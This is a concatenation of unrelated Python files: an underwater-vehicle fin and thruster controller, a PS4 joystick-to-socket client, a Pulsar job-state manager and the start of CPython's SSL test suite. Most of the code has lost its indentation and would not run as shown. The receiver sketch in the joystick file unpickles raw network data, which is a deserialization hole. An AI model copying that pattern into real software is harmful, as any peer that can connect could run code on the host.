trans.transform.translation.z])
quat = np.array([trans.transform.rotation.x,
trans.transform.rotation.y,
trans.transform.rotation.z,
trans.transform.rotation.w])
self.get_logger().info('Thruster transform found %s -> %s' % (base, frame))
self.get_logger().info('pos=' + str(pos))
self.get_logger().info('rot=' + str(quat))
# Read transformation from thruster
# params = {key: val.value for key, val in params.items()}
self.thruster = Thruster.create_thruster(
self,
self.thruster_config['conversion_fcn'], 0,
self.thruster_topic, pos, quat,
**self.thruster_config['conversion_fcn_params'])
self.get_logger().info('Thruster configuration=\n' + str(self.thruster_config))
self.get_logger().info('Thruster input topic=' + self.thruster_topic)
self.pub_cmd = list()
for i in range(self.n_fins):
topic = self.build_fin_topic_name(self.fin_topic_prefix, i, self.fin_topic_suffix)
#topic = '%s/id_%d/%s' % (self.fin_topic_prefix, i, self.fin_topic_suffix)
self.pub_cmd.append(
self.create_publisher(FloatStamped, topic, 10))
self.odometry_sub = self.create_subscription(
Odometry, 'odom', self.odometry_callback, 10)
self.reference_pub = self.create_publisher(
TrajectoryPoint, 'reference', 1)
# Publish error (for debugging)
self.error_pub = self.create_publisher(
TrajectoryPoint, 'error', 1)
self._ready = True
self.get_logger().info('AUV geometric tracking controller: ready')
self.init_future.set_result(True)
#==========================================================================
@property
def ready(self):
return self._ready
#==========================================================================
@staticmethod
def unwrap_angle(t):
return math.atan2(math.sin(t),math.cos(t))
#==========================================================================
@staticmethod
def vector_to_np(v):
return np.array([v.x, v.y, v.z])
#==========================================================================
@staticmethod
def quaternion_to_np(q):
return np.array([q.x, q.y, q.z, q.w])
#==========================================================================
def odometry_callback(self, msg):
"""Handle odometry callback: The actual control loop."""
# Update local planner's vehicle position and orientation
pos = [msg.pose.pose.position.x,
msg.pose.pose.position.y,
msg.pose.pose.position.z]
quat = [msg.pose.pose.orientation.x,
msg.pose.pose.orientation.y,
msg.pose.pose.orientation.z,
msg.pose.pose.orientation.w]
self.local_planner.update_vehicle_pose(pos, quat)
# Compute the desired position
t = time_in_float_sec(self.get_clock().now())
des = self.local_planner.interpolate(t)
# Publish the reference
ref_msg = TrajectoryPoint()
ref_msg.header.stamp = self.get_clock().now().to_msg()
ref_msg.header.frame_id = self.local_planner.inertial_frame_id
ref_msg.pose.position = geometry_msgs.Point(**self.to_dict_vect3(*des.p))
ref_msg.pose.orientation = geometry_msgs.Quaternion(**self.to_dict_quat(*des.q))
ref_msg.velocity.linear = geometry_msgs.Vector3(**self.to_dict_vect3(*des.vel[0:3]))
ref_msg.velocity.angular = geometry_msgs.Vector3(**self.to_dict_vect3(*des.vel[3::]))
self.reference_pub.publish(ref_msg)
p = self.vector_to_np(msg.pose.pose.position)
forward_vel = self.vector_to_np(msg.twist.twist.linear)
ref_vel = des.vel[0:3]
q = self.quaternion_to_np(msg.pose.pose.orientation)
rpy = euler_from_quaternion(q, axes='sxyz')
# Compute tracking errors wrt world frame:
e_p = des.p - p
abs_pos_error = np.linalg.norm(e_p)
abs_vel_error = np.linalg.norm(ref_vel - forward_vel)
# Generate error message
error_msg = TrajectoryPoint()
error_msg.header.stamp = self.get_clock().now().to_msg()
error_msg.header.frame_id = self.local_planner.inertial_frame_id
error_msg.pose.position = geometry_msgs.Point(**self.to_dict_vect3(*e_p))
error_msg.pose.orientation = geometry_msgs.Quaternion(
**self.to_dict_quat(*quaternion_multiply(quaternion_inverse(q), des.q)))
error_msg.velocity.linear = geometry_msgs.Vector3(
**self.to_dict_vect3(*(des.vel[0:3] - self.vector_to_np(msg.twist.twist.linear))))
error_msg.velocity.angular = geometry_msgs.Vector3(
**self.to_dict_vect3(*(des.vel[3::] - self.vector_to_np(msg.twist.twist.angular))))
# Based on position tracking error: Compute desired orientation
pitch_des = -math.atan2(e_p[2], np.linalg.norm(e_p[0:2]))
# Limit desired pitch angle:
pitch_des = max(-self.desired_pitch_limit, min(pitch_des, self.desired_pitch_limit))
yaw_des = math.atan2(e_p[1], e_p[0])
yaw_err = self.unwrap_angle(yaw_des - rpy[2])
# Limit yaw effort
yaw_err = min(self.yaw_error_limit, max(-self.yaw_error_limit, yaw_err))
# Roll: P controller to keep roll == 0
roll_control = self.p_roll * rpy[0]
# Pitch: P controller to reach desired pitch angle
pitch_control = self.p_pitch * self.unwrap_angle(pitch_des - rpy[1]) + self.d_pitch * (des.vel[4] - msg.twist.twist.angular.y)
# Yaw: P controller to reach desired yaw angle
yaw_control = self.p_yaw * yaw_err + self.d_yaw * (des.vel[5] - msg.twist.twist.angular.z)
# Limit thrust
thrust = min(self.max_thrust, self.p_gain_thrust * np.linalg.norm(abs_pos_error) + self.d_gain_thrust * abs_vel_error)
thrust = max(self.min_thrust, thrust)
rpy = np.array([roll_control, pitch_control, yaw_control])
# In case the world_ned reference frame is used, convert the commands back
# to the ENU convention to generate the reference fin angles
rtf = deepcopy(self.rpy_to_fins)
if self.local_planner.inertial_frame_id == 'world_ned':
rtf[:, 1] *= -1
rtf[:, 2] *= -1
# Transform orientation command into fin angle set points
fins = rtf.dot(rpy)
# Check for saturation
max_angle = max(np.abs(fins))
if max_angle >= self.max_fin_angle:
fins = fins * self.max_fin_angle / max_angle
thrust_force = self.thruster.tam_column * thrust
self.thruster.publish_command(thrust_force[0])
cmd = FloatStamped()
for i in range(self.n_fins):
cmd.header.stamp = self.get_clock().now().to_msg()
cmd.header.frame_id = '%s/fin%d' % (self.namespace, i)
cmd.data = min(fins[i], self.max_fin_angle)
cmd.data = max(cmd.data, -self.max_fin_angle)
self.pub_cmd[i].publish(cmd)
self.error_pub.publish(error_msg)
#==========================================================================
def get_parameter_or_helper(self, name, default_value):
return get_parameter_or_helper(self, name, default_value)
# =========================================================================
def build_thruster_topic_name(self, namespace, topic_prefix, id, topic_suffix) -> str:
return '/%s/%s/id_%d/%s' % (namespace, topic_prefix, id, topic_suffix)
# =========================================================================
def build_fin_topic_name(self, topic_prefix, id, topic_suffix) -> str:
return '%s/id_%d/%s' % (topic_prefix, id, topic_suffix)
# =========================================================================
def to_dict_vect3(self, *args) -> dict:
return { 'x': args[0], 'y': args[1], 'z': args[2] }
# =========================================================================
def to_dict_quat(self, *args) -> dict:
return { 'x': args[0], 'y': args[1], 'z': args[2], 'w': args[3] }
#==============================================================================
def main():
print('Starting AUV trajectory tracker')
rclpy.init()
try:
sim_time_param = is_sim_time()
tf_world_ned_to_enu = get_world_ned_to_enu(sim_time_param)
node = AUVGeometricTrackingController(
'auv_geometric_tracking_controller',
world_ned_to_enu=tf_world_ned_to_enu,
parameter_overrides=[sim_time_param])
rclpy.spin(node)
except Exception as e:
print('caught exception: ' + repr(e))
traceback.print_exc()
finally:
if rclpy.ok():
rclpy.shutdown()
#==============================================================================
if __name__ == '__main__':
main()
|
controller_client.py
|
####################################################################
# Ruben Cardenes, Clay L. McLeod -- Feb 2020
#
# File: controller_client.py
#
# Description: This script must be executed on the computer connected to a
# PlayStation 4 controller over USB. No driver installation is needed;
# simply plug the PS4 controller into your computer using USB.
# The script was modified to send packets to another device (such as a
# Raspberry Pi) that accepts the PS4 controls and acts on them; a sketch of
# a matching receiver is included below for reference.
#
# NOTE: This script assumes the only joystick plugged in is the PS4 controller.
# If that is not the case, you will need to adapt the class accordingly.
#
# NOTE: Tested on Linux and MacOS
#
# This is a modification from a script by Clay L. McLeod <clay.l.mcleod@gmail.com>
# Distributed under terms of the MIT license.
####################################################################
import os
import pprint
import pygame
import socket
import pickle
import sys
from threading import Thread
HEADERSIZE = 10
class PS4Controller(object):
"""Class representing the PS4 controller"""
controller = None
axis_data = None
button_data = None
hat_data = None
def init(self, address, port):
"""Initialize the joystick components"""
pygame.init()
pygame.joystick.init()
self.controller = pygame.joystick.Joystick(0)
self.controller.init()
self.event_dict = {}
# Create a TCP/IP socket
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = (address, port)
print('connecting to {} port {}'.format(address, port))
self.sock.connect(server_address)
self.axis_data = {i:0 for i in range(7)}
self.verbose = True
def listen_and_send(self):
"""Listen for events to happen and send commands"""
hadEvent = False
if not self.axis_data:
self.axis_data = {}
if not self.button_data:
self.button_data = {}
for i in range(self.controller.get_numbuttons()):
self.button_data[i] = False
if not self.hat_data:
self.hat_data = {}
for i in range(self.controller.get_numhats()):
self.hat_data[i] = (0, 0)
while True:
for event in pygame.event.get():
if event.type == pygame.JOYAXISMOTION:
self.axis_data[event.axis] = round(event.value, 2)
elif event.type == pygame.JOYBUTTONDOWN:
self.button_data[event.button] = True
elif event.type == pygame.JOYBUTTONUP:
self.button_data[event.button] = False
elif event.type == pygame.JOYHATMOTION:
self.hat_data[event.hat] = event.value
if event.type == pygame.JOYBUTTONDOWN:
# A button on the joystick just got pushed down
hadEvent = True
elif event.type == pygame.JOYAXISMOTION:
# A joystick has been moved
hadEvent = True
if hadEvent:
# If platform is linux we need to change some values in axis_data
os.system('clear')
print("Axis before")
pprint.pprint(self.axis_data)
if sys.platform == 'linux':
#self.axis_data[2], self.axis_data[3], self.axis_data[4] = self.axis_data[4], self.axis_data[2], self.axis_data[3]
temp2 = self.axis_data[2]
temp3 = self.axis_data[3]
temp4 = self.axis_data[4]
self.axis_data[2] = temp4
self.axis_data[3] = temp2
self.axis_data[4] = temp3
self.event_dict['axis'] = self.axis_data
self.event_dict['button'] = self.button_data
message = pickle.dumps(self.event_dict, protocol=4)
message = bytes(f"{len(message):<{HEADERSIZE}}", 'utf-8') + message
self.sock.sendall(message)
#if self.button_data[4]:
# self.verbose = not self.verbose
if self.verbose:
# print("Button ")
# pprint.pprint(self.button_data)
print("Axis ")
pprint.pprint(self.axis_data)
# print("Motion ")
# pprint.pprint(self.hat_data)
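# For reference, a minimal sketch of the receiving side (e.g. the script running
# on the Raspberry Pi). This is an illustration only and not part of the original
# controller client; it assumes the same HEADERSIZE length prefix and pickled
# payload produced by listen_and_send() above.
def example_receive_loop(bind_address='0.0.0.0', port=10200):
    """Accept one controller connection and print decoded axis/button events."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((bind_address, port))
    server.listen(1)
    conn, _ = server.accept()
    buffer = b''
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            break
        buffer += chunk
        # The first HEADERSIZE bytes carry the payload length as ASCII digits
        while len(buffer) >= HEADERSIZE:
            length = int(buffer[:HEADERSIZE])
            if len(buffer) < HEADERSIZE + length:
                break
            event_dict = pickle.loads(buffer[HEADERSIZE:HEADERSIZE + length])
            buffer = buffer[HEADERSIZE + length:]
            print(event_dict.get('axis'), event_dict.get('button'))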
if __name__ == "__main__":
ps4 = PS4Controller()
server_hostname = 'localhost'
if len(sys.argv) > 1:
server_hostname = sys.argv[1]
print("Starting connection to ", server_hostname)
ps4.init(server_hostname, 10200)
#t = Thread(target=ps4.listen_and_send(), args=()).start()
#Non-threaded version
ps4.listen_and_send()
|
stateful.py
|
from __future__ import division
import contextlib
import datetime
import os
import time
import threading
try:
# If galaxy-lib or Galaxy 19.05 present.
from galaxy.tools.deps.dependencies import DependenciesDescription
except ImportError:
# If galaxy-tool-util or Galaxy 19.09 present.
from galaxy.tool_util.deps.dependencies import DependenciesDescription
from pulsar.client.util import filter_destination_params
from pulsar.managers import ManagerProxy
from pulsar.managers import status
from pulsar.managers.util.retry import RetryActionExecutor
from .staging import preprocess
from .staging import postprocess
import logging
log = logging.getLogger(__name__)
DEFAULT_DO_MONITOR = False
DEACTIVATE_FAILED_MESSAGE = "Failed to deactivate job with job id %s. May cause problems on next Pulsar start."
ACTIVATE_FAILED_MESSAGE = "Failed to activate job with job id %s. This job may not recover properly upon Pulsar restart."
JOB_FILE_FINAL_STATUS = "final_status"
JOB_FILE_POSTPROCESSED = "postprocessed"
JOB_FILE_PREPROCESSED = "preprocessed"
JOB_FILE_PREPROCESSING_FAILED = "preprocessing_failed"
JOB_METADATA_RUNNING = "running"
ACTIVE_STATUS_PREPROCESSING = "preprocessing"
ACTIVE_STATUS_LAUNCHED = "launched"
DEFAULT_MIN_POLLING_INTERVAL = 0.5
class StatefulManagerProxy(ManagerProxy):
"""
"""
def __init__(self, manager, **manager_options):
super(StatefulManagerProxy, self).__init__(manager)
min_polling_interval = float(manager_options.get("min_polling_interval", DEFAULT_MIN_POLLING_INTERVAL))
preprocess_retry_action_kwds = filter_destination_params(manager_options, "preprocess_action_")
postprocess_retry_action_kwds = filter_destination_params(manager_options, "postprocess_action_")
self.__preprocess_action_executor = RetryActionExecutor(**preprocess_retry_action_kwds)
self.__postprocess_action_executor = RetryActionExecutor(**postprocess_retry_action_kwds)
self.min_polling_interval = datetime.timedelta(0, min_polling_interval)
self.active_jobs = ActiveJobs.from_manager(manager)
self.__state_change_callback = self._default_status_change_callback
self.__monitor = None
def set_state_change_callback(self, state_change_callback):
self.__state_change_callback = state_change_callback
self.__monitor = ManagerMonitor(self)
def _default_status_change_callback(self, status, job_id):
log.info("Status of job [%s] changed to [%s]. No callbacks enabled." % (job_id, status))
@property
def name(self):
return self._proxied_manager.name
def setup_job(self, *args, **kwargs):
job_id = self._proxied_manager.setup_job(*args, **kwargs)
return job_id
def _persist_launch_config(self, job_id, launch_config):
job_directory = self._proxied_manager.job_directory(job_id)
job_directory.store_metadata("launch_config", launch_config)
def touch_outputs(self, job_id, touch_outputs):
job_directory = self._proxied_manager.job_directory(job_id)
for name in touch_outputs:
path = job_directory.calculate_path(name, 'output')
job_directory.open_file(path, mode='a')
def preprocess_and_launch(self, job_id, launch_config):
self._persist_launch_config(job_id, launch_config)
requires_preprocessing = launch_config.get("remote_staging") and launch_config["remote_staging"].get("setup")
if requires_preprocessing:
self.active_jobs.activate_job(job_id, active_status=ACTIVE_STATUS_PREPROCESSING)
self._launch_prepreprocessing_thread(job_id, launch_config)
else:
with self._handling_of_preprocessing_state(job_id, launch_config):
pass
def _launch_prepreprocessing_thread(self, job_id, launch_config):
def do_preprocess():
with self._handling_of_preprocessing_state(job_id, launch_config):
job_directory = self._proxied_manager.job_directory(job_id)
staging_config = launch_config.get("remote_staging", {})
# TODO: swap out for a generic "job_extra_params"
if 'action_mapper' in staging_config and \
'ssh_key' in staging_config['action_mapper'] and \
'setup' in staging_config:
for action in staging_config['setup']:
action['action'].update(ssh_key=staging_config['action_mapper']['ssh_key'])
setup_config = staging_config.get("setup", [])
preprocess(job_directory, setup_config, self.__preprocess_action_executor, object_store=self.object_store)
self.active_jobs.deactivate_job(job_id, active_status=ACTIVE_STATUS_PREPROCESSING)
new_thread_for_job(self, "preprocess", job_id, do_preprocess, daemon=False)
@contextlib.contextmanager
def _handling_of_preprocessing_state(self, job_id, launch_config):
job_directory = self._proxied_manager.job_directory(job_id)
try:
yield
launch_kwds = {}
if launch_config.get("dependencies_description"):
dependencies_description = DependenciesDescription.from_dict(launch_config["dependencies_description"])
launch_kwds["dependencies_description"] = dependencies_description
for kwd in ["submit_params", "setup_params", "env"]:
if kwd in launch_config:
launch_kwds[kwd] = launch_config[kwd]
self._proxied_manager.launch(
job_id,
launch_config["command_line"],
**launch_kwds
)
with job_directory.lock("status"):
job_directory.store_metadata(JOB_FILE_PREPROCESSED, True)
self.active_jobs.activate_job(job_id)
except Exception as e:
with job_directory.lock("status"):
job_directory.store_metadata(JOB_FILE_PREPROCESSING_FAILED, True)
job_directory.store_metadata("return_code", 1)
job_directory.write_file("stderr", str(e))
self.__state_change_callback(status.FAILED, job_id)
log.exception("Failed job preprocessing for job %s:", job_id)
def handle_failure_before_launch(self, job_id):
self.__state_change_callback(status.FAILED, job_id)
def get_status(self, job_id):
""" Compute status used proxied manager and handle state transitions
and track additional state information needed.
"""
job_directory = self._proxied_manager.job_directory(job_id)
with job_directory.lock("status"):
proxy_status, state_change = self.__proxy_status(job_directory, job_id)
if state_change == "to_complete":
self.__deactivate(job_id, proxy_status)
elif state_change == "to_running":
self.__state_change_callback(status.RUNNING, job_id)
return self.__status(job_directory, proxy_status)
def __proxy_status(self, job_directory, job_id):
""" Determine state with proxied job manager and if this job needs
to be marked as deactivated (this occurs when job first returns a
complete status from proxy.
"""
state_change = None
if job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED):
proxy_status = status.FAILED
job_directory.store_metadata(JOB_FILE_FINAL_STATUS, proxy_status)
state_change = "to_complete"
elif not job_directory.has_metadata(JOB_FILE_PREPROCESSED):
proxy_status = status.PREPROCESSING
elif job_directory.has_metadata(JOB_FILE_FINAL_STATUS):
proxy_status = job_directory.load_metadata(JOB_FILE_FINAL_STATUS)
else:
proxy_status = self._proxied_manager.get_status(job_id)
if proxy_status == status.RUNNING:
if not job_directory.has_metadata(JOB_METADATA_RUNNING):
job_directory.store_metadata(JOB_METADATA_RUNNING, True)
state_change = "to_running"
elif proxy_status in [status.COMPLETE, status.CANCELLED]:
job_directory.store_metadata(JOB_FILE_FINAL_STATUS, proxy_status)
state_change = "to_complete"
return proxy_status, state_change
def __status(self, job_directory, proxy_status):
""" Use proxied manager's status to compute the real
(stateful) status of job.
"""
if proxy_status == status.COMPLETE:
if not job_directory.has_metadata(JOB_FILE_POSTPROCESSED):
job_status = status.POSTPROCESSING
else:
job_status = status.COMPLETE
else:
job_status = proxy_status
return job_status
def __deactivate(self, job_id, proxy_status):
self.active_jobs.deactivate_job(job_id)
deactivate_method = getattr(self._proxied_manager, "_deactivate_job", None)
if deactivate_method:
try:
deactivate_method(job_id)
except Exception:
log.exception("Failed to deactivate via proxied manager job %s" % job_id)
if proxy_status == status.COMPLETE:
self.__handle_postprocessing(job_id)
def __handle_postprocessing(self, job_id):
def do_postprocess():
postprocess_success = False
job_directory = self._proxied_manager.job_directory(job_id)
try:
postprocess_success = postprocess(job_directory, self.__postprocess_action_executor)
except Exception:
log.exception("Failed to postprocess results for job id %s" % job_id)
final_status = status.COMPLETE if postprocess_success else status.FAILED
if job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED):
final_status = status.FAILED
self.__state_change_callback(final_status, job_id)
new_thread_for_job(self, "postprocess", job_id, do_postprocess, daemon=False)
def shutdown(self, timeout=None):
if self.__monitor:
try:
self.__monitor.shutdown(timeout)
except Exception:
log.exception("Failed to shutdown job monitor for manager %s" % self.name)
super(StatefulManagerProxy, self).shutdown(timeout)
def recover_active_jobs(self):
unqueue_preprocessing_ids = []
for job_id in self.active_jobs.active_job_ids(active_status=ACTIVE_STATUS_PREPROCESSING):
job_directory = self._proxied_manager.job_directory(job_id)
if not job_directory.has_metadata("launch_config"):
log.warn("Failed to find launch parameters for job scheduled to prepreprocess [%s]" % job_id)
unqueue_preprocessing_ids.append(job_id)
elif job_directory.has_metadata(JOB_FILE_PREPROCESSED):
log.warn("Job scheduled to prepreprocess [%s] already preprocessed, skipping" % job_id)
unqueue_preprocessing_ids.append(job_id)
elif job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED):
log.warn("Job scheduled to prepreprocess [%s] previously failed preprocessing, skipping" % job_id)
unqueue_preprocessing_ids.append(job_id)
else:
launch_config = job_directory.load_metadata("launch_config")
self._launch_prepreprocessing_thread(job_id, launch_config)
for unqueue_preprocessing_id in unqueue_preprocessing_ids:
self.active_jobs.deactivate_job(unqueue_preprocessing_id, active_status=ACTIVE_STATUS_PREPROCESSING)
recover_method = getattr(self._proxied_manager, "_recover_active_job", None)
if recover_method is None:
return
for job_id in self.active_jobs.active_job_ids(active_status=ACTIVE_STATUS_LAUNCHED):
try:
recover_method(job_id)
except Exception:
log.exception("Failed to recover active job %s" % job_id)
self.__handle_recovery_problem(job_id)
def __handle_recovery_problem(self, job_id):
# Make sure we tell the client we have lost this job.
self.active_jobs.deactivate_job(job_id)
self.__state_change_callback(status.LOST, job_id)
class ActiveJobs(object):
""" Keeps track of active jobs (those that are not yet "complete").
Current implementation is file based, but could easily be made
database-based instead.
TODO: Keep jobs in memory after initial load so don't need to repeatedly
hit disk to recover this information.
"""
@staticmethod
def from_manager(manager):
persistence_directory = manager.persistence_directory
manager_name = manager.name
return ActiveJobs(manager_name, persistence_directory)
def __init__(self, manager_name, persistence_directory):
if persistence_directory:
active_job_directory = os.path.join(persistence_directory, "%s-active-jobs" % manager_name)
if not os.path.exists(active_job_directory):
os.makedirs(active_job_directory)
preprocessing_job_directory = os.path.join(persistence_directory, "%s-preprocessing-jobs" % manager_name)
if not os.path.exists(preprocessing_job_directory):
os.makedirs(preprocessing_job_directory)
else:
active_job_directory = None
preprocessing_job_directory = None
self.launched_job_directory = active_job_directory
self.preprocessing_job_directory = preprocessing_job_directory
def active_job_ids(self, active_status=ACTIVE_STATUS_LAUNCHED):
job_ids = []
target_directory = self._active_job_directory(active_status)
if target_directory:
job_ids = os.listdir(target_directory)
return job_ids
def activate_job(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED):
if self._active_job_directory(active_status):
path = self._active_job_file(job_id, active_status=active_status)
try:
open(path, "w").close()
except Exception:
log.warn(ACTIVATE_FAILED_MESSAGE % job_id)
def deactivate_job(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED):
if self._active_job_directory(active_status):
path = self._active_job_file(job_id, active_status=active_status)
if os.path.exists(path):
try:
os.remove(path)
except Exception:
log.warn(DEACTIVATE_FAILED_MESSAGE % job_id)
def _active_job_directory(self, active_status):
if active_status == ACTIVE_STATUS_LAUNCHED:
target_directory = self.launched_job_directory
elif active_status == ACTIVE_STATUS_PREPROCESSING:
target_directory = self.preprocessing_job_directory
else:
raise Exception("Unknown active state encountered [%s]" % active_status)
return target_directory
def _active_job_file(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED):
return os.path.join(self._active_job_directory(active_status), job_id)
class ManagerMonitor(object):
""" Monitors active jobs of a StatefulManagerProxy.
"""
def __init__(self, stateful_manager):
self.stateful_manager = stateful_manager
self.active = True
thread = new_thread_for_manager(self.stateful_manager, "[action=monitor]", self._run, True)
self.thread = thread
def shutdown(self, timeout=None):
self.active = False
self.thread.join(timeout)
if self.thread.is_alive():
log.warn("Failed to join monitor thread [%s]" % self.thread)
def _run(self):
""" Main loop, repeatedly checking active jobs of stateful manager.
"""
while self.active:
try:
self._monitor_active_jobs()
except Exception:
log.exception("Failure in stateful manager monitor step.")
def _monitor_active_jobs(self):
active_job_ids = self.stateful_manager.active_jobs.active_job_ids()
iteration_start = datetime.datetime.now()
for active_job_id in active_job_ids:
try:
self._check_active_job_status(active_job_id)
except Exception:
log.exception("Failed checking active job status for job_id %s" % active_job_id)
iteration_end = datetime.datetime.now()
iteration_length = iteration_end - iteration_start
if iteration_length < self.stateful_manager.min_polling_interval:
to_sleep = (self.stateful_manager.min_polling_interval - iteration_length)
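# The next two lines are a manual timedelta-to-seconds conversion, presumably
# the equivalent of to_sleep.total_seconds() spelled out for Python versions
# that predate timedelta.total_seconds().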
microseconds = to_sleep.microseconds + (to_sleep.seconds + to_sleep.days * 24 * 3600) * (10 ** 6)
total_seconds = microseconds / float(10 ** 6)
time.sleep(total_seconds)
def _check_active_job_status(self, active_job_id):
# Manager itself will handle state transitions when status changes,
# just need to poll get_status
self.stateful_manager.get_status(active_job_id)
def new_thread_for_job(manager, action, job_id, target, daemon):
name = "[action=%s]-[job=%s]" % (action, job_id)
return new_thread_for_manager(manager, name, target, daemon)
def new_thread_for_manager(manager, name, target, daemon):
thread_name = "[manager=%s]-%s" % (manager.name, name)
thread = threading.Thread(name=thread_name, target=target)
thread.daemon = daemon
thread.start()
return thread
__all__ = ('StatefulManagerProxy',)
|
test_ssl.py
|
# -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
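# Note on the version tuples above: ssl.OPENSSL_VERSION_INFO is a five-element
# tuple (major, minor, fix, patch, status) in which the patch letter is encoded
# as a number (13 == "m") and a status of 15 means a release build, so
# (0, 9, 8, 13, 15) corresponds to OpenSSL 0.9.8m; _OPENSSL_API_VERSION appears
# to use the same layout.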
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
@unittest.skipIf(support.is_jython, "Jython does not have _ssl, therefore this test needs to be rewritten")
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
